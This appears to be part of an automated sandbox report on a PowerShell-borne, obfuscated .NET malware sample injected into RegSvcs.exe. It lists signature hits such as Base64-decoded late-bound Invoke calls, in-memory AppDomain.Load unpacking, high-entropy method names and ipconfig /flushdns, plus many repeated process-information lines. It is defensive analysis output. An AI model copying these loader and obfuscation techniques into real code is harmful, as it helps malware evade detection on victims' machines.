            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.dLJPDdcnEB9Ryo3voJBtwByyX3jjekjmR8inZ248xeorAqp7aT,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H._86oD7O9CdPNRJUhwMZezIFe4l8dPJlx5u8m8PlLWT4Wt6sQiJY,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.PA4Un7xVNvWhpahuqjh5Y3O425ZhHVE8kqZl,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.WFCAstKfN2gtu4FfocLdbZGGqqYvKz8fT7xXe6mh990ANevPjt,gu9bOeQlhx.lSNVNSUCuC()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[2],gu9bOeQlhx._7pHqSkwgqs(Convert.FromBase64String(V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.dLJPDdcnEB9Ryo3voJBtwByyX3jjekjmR8inZ248xeorAqp7aT,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H._86oD7O9CdPNRJUhwMZezIFe4l8dPJlx5u8m8PlLWT4Wt6sQiJY,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.PA4Un7xVNvWhpahuqjh5Y3O425ZhHVE8kqZl,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.WFCAstKfN2gtu4FfocLdbZGGqqYvKz8fT7xXe6mh990ANevPjt,gu9bOeQlhx.lSNVNSUCuC()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[2],gu9bOeQlhx._7pHqSkwgqs(Convert.FromBase64String(V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs.Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA36FCF push edi; iretd 0_2_00007FFAACA36FD6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA3580F push ds; retf 0_2_00007FFAACA35811
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAACA35000 push E8FFFFFFh; iretd 0_2_00007FFAACA3500D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_03048080 push eax; iretd 10_2_03048081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_03044CC8 pushad ; retf 10_2_03044CD1
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, CUJj8rhTUC.csHigh entropy of concatenated method names: 'B6q5G2SIT3', 'c0yaeoBjrR', 'hqd77vuGNU', 'KAYiml3MsKtSc', 'aiv8ZoOT4YBI8', '_46tL3teOEXUNN', 'WwEgkF8WBRcy4', 'uf2h91FEycj3T', 'Vw1iDoDKujbPw', 'mclGE0Q7t0qYP'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, aZ4hnq2aA0KBpgqPEF.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'mfNAitIckj4NZM6UvH1WtT0cue9liZa005dgrRM0kgmaaIxrJHD9ILQlGpqIFR1C5GmuLllOEDkazdBhh6VYu', 'NHutEdEkvOOERLuOEb6yRWTK2awrs6KebesmsBpgwYWUmGAwSJiGrRBBJZ1prqskP7hlrR0N6c6pwmywJnTCw', 'LOGfXtOFZW4Pm8XImq83GhOS2o3Yi74U3cP8h34tx1H4IU3tMYVzoTFutNiMsGUxMMYHYiGcTomBNmNaiwLVU', 'JguyEvhJ96xgcTi0zKq907HnYwvahHf1v3VIOnGGmI2lpBIr34ZT8aXP3B5jqIUldb8XD3xFHm4GqInQdxIYI'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, VN8UZyy4b6ESNDqqUGSm1D0bAFxMFecwJPTD.csHigh entropy of concatenated method names: 'RPuGXQ6eEPp6geOU0Iy1GedXs9zIFQfbQiqK', 'dSVoLC7GYwuGmoyaVZclYPKORUHHj2TjLpRx', 'xq7xlHw70jBHUJMXu0b63cowWU4Ak5ikAIf0', 'hgBtEJpsPGe2j4wka5wZmq3TR39i', 'YlnKy17j3mFutVXogXJv6TM1FOQM', 'WwxBrAJWPj9pbxi8xfwtPAvobkD7', 'lx2tjivEac0BPCldO9jc0aiU4eIJ', 'sNi3XLBswlyQCqHHMo347fz3LPBL', 'rU79mJTlAyFvUhEToiFuryRnbHsd', 'ce21UxqN1xMrMSQscrnLQ6jlYx0R'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.csHigh entropy of concatenated method names: '_88MEWWYcTrle5x9y1E3bbVOGiOhVYNIQ3HPrg8qL3Tt4jab8uIETF2yzNFMYqCpkq6oV', 'iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ', '_7uR9cusSyJEG8gI4fkoCkUrTHpTSpS29ZRX42sqWEWeL62HurIIVSdQNIVjwZGNcF6zI', 'z7Uu9Nwst38xH4Lb6iK6wscd1IvVTSDvqdBub3tkAd6kqZpG3NQc4nIupLyQVORTimKf', 'zDnCSJCxRduAbj3BVWXYmD8zW78orZqfPTNFH64ftnI0RiuCR1oK8y9iBJoMuoWa396W', 'sHWogUHlM5T3zyke8kOpBp0Kpsm1IUJJIYzPMZv4wS97epweNmefkbPA1zjJyTjMX8yu', 'XKXISg8cLhCpPEY3YssrbnrtvEkGkN4oRZj1N9uN1MsyKPtEFnDrKU6jebrlYra1NaWF', 'UBfcoXf9N6NSfgoXEIuWevbZ39xKvGThVPs0RNcxd7D70LRyWbSqTmnIBYXD87MRtShW', 'cqoNrWhmsgxXe090rjLWJqKQOHivj8cZcEYpREDUfj4fZmYtRsaEIAQNBbBTMmPiQED5', 'XITq9yUmYpS97z27lpSPUFacRf8UKfHW6RSBbSryUWljkM2WABqCYcMZjjl8Cz2trKES'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csHigh entropy of concatenated method names: 'K80s31ehnbTVEI4xL20Ml4v6hiDsMt2RT8Ke', 'Ic27ZYv8gPxLBu153FcudUwF9Ypa4lBkRvU3', 'oLDaVx8R7yqkdek4HxnPoMvlPLumWh42MsG4', 'UIoyb1EAVJ7DqYwwG4mEn86W2bIYrRKFtpjH', 'l3yJSMntP0aYhoUEQOIQiJ5MZMqnBBP8cH1h', 'YeIu5xqL9eFZ9yeDRUxZAVc5ol0vdbOF7MjQ', 'l0Vm0T55LV9uwyEUPA4YVhJ5zdJjC1FkyClX', 'a27dj8pdk7A2gTh6c8azwKq3GdPf4RBzEUU3', 'pabemwh3cC8ok4MqUKtUTAHOqH1eSpGMtCAu', 'rkgxmEW6ZGSC7RrGtgZhXDJjWerMKkrczxje'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, YyDTZrRoQx.csHigh entropy of concatenated method names: 'pH7JWkO8j8', 'y2ctnHNEemJ0b4dJSzr9951KJmUs', 'IH23sQMbMknL1tPv5C0CR180vRdv', '_7gd1KKxxKTOLCOQGeJjpw9WH2uIu', 'zB3h7kGtmNeaSPX4wxVktKFdmblc'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, g3vLTCbXUu.csHigh entropy of concatenated method names: 'Q8mwWLJjkp', 'DNXOHjXwwRN1Y0RZf8HGbp9XxdXj', 'yhm3mFjiu8qKagIG8tkVrfuICeQX', 'OZiOuYY75mwyk48M17of3NsL9IIt', 'Arr2zYwfIT23ekIUKysmLNPfG32B'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, gu9bOeQlhx.csHigh entropy of concatenated method names: 'IJ8IZmUQCc', '_9wFk9JCSot', 'GpXlnbAt9M', 'nT2yG43RnY', '_3rRzw2eaDt', 'KVNBLm4Pev', 'oxCLZhLXIe', 'FzoO6KSdPT', 'QrVMKdnxIk', 'qRtUVYT2W1'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, CUJj8rhTUC.csHigh entropy of concatenated method names: 'B6q5G2SIT3', 'c0yaeoBjrR', 'hqd77vuGNU', 'KAYiml3MsKtSc', 'aiv8ZoOT4YBI8', '_46tL3teOEXUNN', 'WwEgkF8WBRcy4', 'uf2h91FEycj3T', 'Vw1iDoDKujbPw', 'mclGE0Q7t0qYP'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, aZ4hnq2aA0KBpgqPEF.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'mfNAitIckj4NZM6UvH1WtT0cue9liZa005dgrRM0kgmaaIxrJHD9ILQlGpqIFR1C5GmuLllOEDkazdBhh6VYu', 'NHutEdEkvOOERLuOEb6yRWTK2awrs6KebesmsBpgwYWUmGAwSJiGrRBBJZ1prqskP7hlrR0N6c6pwmywJnTCw', 'LOGfXtOFZW4Pm8XImq83GhOS2o3Yi74U3cP8h34tx1H4IU3tMYVzoTFutNiMsGUxMMYHYiGcTomBNmNaiwLVU', 'JguyEvhJ96xgcTi0zKq907HnYwvahHf1v3VIOnGGmI2lpBIr34ZT8aXP3B5jqIUldb8XD3xFHm4GqInQdxIYI'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, VN8UZyy4b6ESNDqqUGSm1D0bAFxMFecwJPTD.csHigh entropy of concatenated method names: 'RPuGXQ6eEPp6geOU0Iy1GedXs9zIFQfbQiqK', 'dSVoLC7GYwuGmoyaVZclYPKORUHHj2TjLpRx', 'xq7xlHw70jBHUJMXu0b63cowWU4Ak5ikAIf0', 'hgBtEJpsPGe2j4wka5wZmq3TR39i', 'YlnKy17j3mFutVXogXJv6TM1FOQM', 'WwxBrAJWPj9pbxi8xfwtPAvobkD7', 'lx2tjivEac0BPCldO9jc0aiU4eIJ', 'sNi3XLBswlyQCqHHMo347fz3LPBL', 'rU79mJTlAyFvUhEToiFuryRnbHsd', 'ce21UxqN1xMrMSQscrnLQ6jlYx0R'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.csHigh entropy of concatenated method names: '_88MEWWYcTrle5x9y1E3bbVOGiOhVYNIQ3HPrg8qL3Tt4jab8uIETF2yzNFMYqCpkq6oV', 'iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ', '_7uR9cusSyJEG8gI4fkoCkUrTHpTSpS29ZRX42sqWEWeL62HurIIVSdQNIVjwZGNcF6zI', 'z7Uu9Nwst38xH4Lb6iK6wscd1IvVTSDvqdBub3tkAd6kqZpG3NQc4nIupLyQVORTimKf', 'zDnCSJCxRduAbj3BVWXYmD8zW78orZqfPTNFH64ftnI0RiuCR1oK8y9iBJoMuoWa396W', 'sHWogUHlM5T3zyke8kOpBp0Kpsm1IUJJIYzPMZv4wS97epweNmefkbPA1zjJyTjMX8yu', 'XKXISg8cLhCpPEY3YssrbnrtvEkGkN4oRZj1N9uN1MsyKPtEFnDrKU6jebrlYra1NaWF', 'UBfcoXf9N6NSfgoXEIuWevbZ39xKvGThVPs0RNcxd7D70LRyWbSqTmnIBYXD87MRtShW', 'cqoNrWhmsgxXe090rjLWJqKQOHivj8cZcEYpREDUfj4fZmYtRsaEIAQNBbBTMmPiQED5', 'XITq9yUmYpS97z27lpSPUFacRf8UKfHW6RSBbSryUWljkM2WABqCYcMZjjl8Cz2trKES'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.csHigh entropy of concatenated method names: 'K80s31ehnbTVEI4xL20Ml4v6hiDsMt2RT8Ke', 'Ic27ZYv8gPxLBu153FcudUwF9Ypa4lBkRvU3', 'oLDaVx8R7yqkdek4HxnPoMvlPLumWh42MsG4', 'UIoyb1EAVJ7DqYwwG4mEn86W2bIYrRKFtpjH', 'l3yJSMntP0aYhoUEQOIQiJ5MZMqnBBP8cH1h', 'YeIu5xqL9eFZ9yeDRUxZAVc5ol0vdbOF7MjQ', 'l0Vm0T55LV9uwyEUPA4YVhJ5zdJjC1FkyClX', 'a27dj8pdk7A2gTh6c8azwKq3GdPf4RBzEUU3', 'pabemwh3cC8ok4MqUKtUTAHOqH1eSpGMtCAu', 'rkgxmEW6ZGSC7RrGtgZhXDJjWerMKkrczxje'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, YyDTZrRoQx.csHigh entropy of concatenated method names: 'pH7JWkO8j8', 'y2ctnHNEemJ0b4dJSzr9951KJmUs', 'IH23sQMbMknL1tPv5C0CR180vRdv', '_7gd1KKxxKTOLCOQGeJjpw9WH2uIu', 'zB3h7kGtmNeaSPX4wxVktKFdmblc'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, g3vLTCbXUu.csHigh entropy of concatenated method names: 'Q8mwWLJjkp', 'DNXOHjXwwRN1Y0RZf8HGbp9XxdXj', 'yhm3mFjiu8qKagIG8tkVrfuICeQX', 'OZiOuYY75mwyk48M17of3NsL9IIt', 'Arr2zYwfIT23ekIUKysmLNPfG32B'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, gu9bOeQlhx.csHigh entropy of concatenated method names: 'IJ8IZmUQCc', '_9wFk9JCSot', 'GpXlnbAt9M', 'nT2yG43RnY', '_3rRzw2eaDt', 'KVNBLm4Pev', 'oxCLZhLXIe', 'FzoO6KSdPT', 'QrVMKdnxIk', 'qRtUVYT2W1'

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
